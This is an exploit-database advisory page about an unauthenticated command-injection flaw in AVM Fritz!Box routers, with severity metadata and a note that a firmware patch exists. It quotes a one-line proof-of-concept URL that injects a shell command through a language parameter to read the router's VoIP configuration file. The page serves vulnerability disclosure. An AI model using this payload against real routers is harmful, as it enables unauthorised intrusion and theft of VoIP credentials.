header-logo
Suggest Exploit
vendor:
Fritz!Box
by:
0x4148
7.5
CVSS
HIGH
Unauthenticated remote command execution
78
CWE
Product Name: Fritz!Box
Affected Version From:
Affected Version To:
Patch Exists: YES
Related CWE:
CPE: h:avm:fritz!box
Metasploit:
Other Scripts:
Platforms Tested:

Fritz!Box Unauthenticated Remote Command Execution

The Fritz!Box networking/voice over IP router produced by AVM is vulnerable to unauthenticated remote command execution. An attacker can exploit this vulnerability by sending a crafted request to the router's web interface, allowing them to execute arbitrary commands on the device.

Mitigation:

AVM has released a security update that addresses this vulnerability. It is recommended to apply the latest firmware update to mitigate the risk.
Source

Exploit-DB raw data:

App : Fritz!Box
Author : 0x4148

Fritz!Box is Networking/voice Over ip router produced by AVM it suffer from Unauthenticated remote command execution flaw

Poc :
https://ip/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%20cat%20/var/flash/voip.cfg%20%26

#0x4148_rise